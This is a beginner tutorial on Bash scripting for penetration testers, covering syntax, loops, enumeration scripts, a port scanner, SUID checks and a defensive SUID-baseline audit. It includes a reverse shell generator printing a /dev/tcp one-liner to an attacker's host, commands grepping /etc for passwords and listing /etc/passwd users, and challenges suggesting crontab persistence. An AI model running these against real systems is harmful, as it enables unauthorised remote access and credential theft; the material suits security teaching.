Bash Scripting for Pentesters
Table of Contents
- What is Bash?
- Why Pentesters Should Learn Bash
- Setting Up Your First Script
- Bash Syntax Basics
- Variables and User Input
- Conditional Statements (if/else)
- Loops (for, while)
- Functions in Bash
- Useful Built-in Commands
- Writing Your First Useful Pentesting Scripts
- Automating Enumeration Tasks
- Real-World Pentest Script Examples
- Tips, Tricks, and Gotchas
- Practice Challenges
1. What is Bash?
Bash (Bourne Again SHell) is a shell and scripting language for Linux. It lets you run commands, automate tasks, and build logic — all from the terminal.
2. Why Pentesters Should Learn Bash
- Automate enumeration & exploitation
- Script post-exploitation tasks
- Stay stealthy and avoid noisy tools
- Work efficiently in low-resource environments
3. Setting Up Your First Script
```bash
nano myscript.sh      # Create a new script file
```
The first line of the file must be the shebang, on a line of its own (anything else on that line is passed to the interpreter as an argument and breaks the script):
```bash
#!/bin/bash
# Shebang (line above) - tells the OS to use bash to interpret the script
```
Then make it executable and run it:
```bash
chmod +x myscript.sh  # Make the script executable
./myscript.sh         # Run the script
```
4. Bash Syntax Basics
```bash
echo "Hello, world!"   # Prints text to the terminal
# This is a comment    # Comments are ignored by Bash, use them to explain your code
ls -la                 # List all files with details
whoami                 # Show the current user
```
5. Variables and User Input
```bash
name="Wilko"                            # Assign a value to a variable
echo "Hello, $name"                     # Print variable value
read -p "Enter your target IP: " ip     # Prompt user for input
echo "Scanning $ip now..."              # Use that input in your script
```
6. Conditional Statements (if/else)
```bash
if [ "$USER" = "root" ]; then   # Check if current user is root
    echo "You're root!"         # If true, print message
else
    echo "You're not root."     # If false, print alternative message
fi
```
7. Loops (for, while)
For Loop
```bash
for ip in 10.10.1.{1..10}; do   # Loop through a range of IPs (brace expansion)
    ping -c 1 "$ip"             # Ping each IP once
done
```
While Loop
```bash
count=1                         # Start count at 1
while [ "$count" -le 5 ]; do    # Loop while count is less than or equal to 5
    echo "Try $count"           # Print attempt number
    ((count++))                 # Increment count
done
```
8. Functions in Bash
```bash
say_hi() {                  # Define a function
    echo "Hi, hacker!"      # Function body
}
say_hi                      # Call the function
```
9. Useful Built-in Commands
| Command | Purpose |
|---|---|
| `whoami` | Shows current user |
| `hostname` | Displays system's hostname |
| `ifconfig` / `ip a` | Shows network interface configuration |
| `netstat -tunlp` | Lists open ports and associated services |
| `ps aux` | Displays all running processes |
| `find / -name "file"` | Searches for files starting from root |
| `grep "text" file` | Searches for text inside a file |
| `cut -d: -f1 /etc/passwd` | Extracts usernames from passwd file |
| `awk '{print $1}'` | Prints first column of input |
10. Writing Your First Useful Pentesting Scripts
Basic Enumeration Script
```bash
#!/bin/bash
echo "[*] Basic Enumeration on $HOSTNAME"   # Print system name
echo "Current User: $(whoami)"              # Show current user
echo "Home Directory: $HOME"                # Print home directory
echo "[*] Checking for SUID binaries:"
find / -perm -4000 -type f 2>/dev/null      # Find all SUID binaries, hide permission errors
```
Reverse Shell Generator
```bash
#!/bin/bash
read -p "Enter your IP: " ip                        # Ask for attacker's IP
read -p "Enter your port: " port                    # Ask for port
echo "bash -i >& /dev/tcp/$ip/$port 0>&1"           # Print a reverse shell command
```
11. Automating Enumeration Tasks
```bash
#!/bin/bash
echo "[*] Gathering info..."
echo "[+] Users:"
cut -d: -f1 /etc/passwd                 # List all usernames
echo "[+] Network Info:"
ip a                                    # Show IP info
echo "[+] Processes:"
ps aux | head -n 10                     # Show top 10 running processes
echo "[+] Looking for passwords:"
grep -r "password" /etc 2>/dev/null     # Search for the word "password"
```
12. Real-World Pentest Script Examples
Simple Port Scanner
```bash
#!/bin/bash
read -p "Target IP: " ip                    # Ask user for IP
for port in {20..1024}; do
    # /dev/tcp is a bash-only pseudo device; without a timeout a filtered port
    # stalls the loop until the kernel gives up on the connect
    timeout 1 bash -c "echo >/dev/tcp/$ip/$port" >/dev/null 2>&1 && echo "Port $port is open"
done
```
Check for SUID Exploits
```bash
#!/bin/bash
echo "[*] Checking for exploitable SUID files..."
# IFS= and -r keep paths with spaces or backslashes intact
find / -perm -4000 -type f 2>/dev/null | while IFS= read -r file; do   # Find SUID files
    echo "Found: $file"
    strings "$file" | grep "/bin/sh"      # Flag binaries that reference a shell
done
```
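The SUID checks in sections 10 and 12 only list what is there right now. The following is an added example, not part of the original tutorial, that turns the same `find` into a baseline comparison: record the SUID binaries of a known-good host once, then report any that appear later (a new SUID file is a classic privilege-escalation foothold and worth alerting on). It also applies the quoting and function tips from section 13. The directory tree and baseline it builds in `demo` are constructed in a temp dir purely for demonstration.

```bash
#!/bin/bash
# Added example, not from the original tutorial: audit SUID binaries and
# report the ones missing from a known-good baseline.
export LC_ALL=C   # consistent sort order for both sort and comm

# list_suid DIR... : print every SUID regular file below the given dirs, sorted
list_suid() {
    find "$@" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# new_suid BASELINE DIR... : print SUID files present now but not in BASELINE
new_suid() {
    local baseline="$1" sorted
    shift
    sorted="$(mktemp)"
    sort "$baseline" > "$sorted"
    # comm -13 keeps lines that appear only in the second input (stdin here)
    list_suid "$@" | comm -13 "$sorted" -
    rm -f "$sorted"
}

# demo: build a constructed tree in a temp dir with one SUID file recorded
# in the baseline and one that is not, then print the unexpected one.
demo() {
    local root
    root="$(mktemp -d)"
    mkdir -p "$root/bin" "$root/usr/local/bin"
    touch "$root/bin/su" "$root/usr/local/bin/helper tool" "$root/bin/plain"
    chmod 4755 "$root/bin/su" "$root/usr/local/bin/helper tool"   # SUID set
    chmod 0755 "$root/bin/plain"                                   # no SUID
    printf '%s\n' "$root/bin/su" > "$root/suid_baseline.txt"
    new_suid "$root/suid_baseline.txt" "$root"
    rm -rf "$root"
}

# Real use: run "list_suid / > /var/tmp/suid_baseline.txt" once on a
# known-good host, then schedule "new_suid /var/tmp/suid_baseline.txt /"
# and alert on any output.
```

Running `demo` prints only the unexpected `helper tool` path; the baselined `su` and the non-SUID `plain` are silent.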
13. Tips, Tricks, and Gotchas
✅ Always quote variables: "$var" → avoids bugs with spaces
✅ Add set -x at the top for debugging
✅ Redirect unwanted output: 2>/dev/null hides errors
✅ Use functions to keep things tidy and reusable
✅ Always test scripts in a safe environment
14. Practice Challenges
Try building scripts for:
- Auto enumeration on a target box
- Local privilege escalation checks
- Quick pivoting (SSH tunnels or SOCKS)
- Crontab persistence setup
- Base64 encoding/decoding files
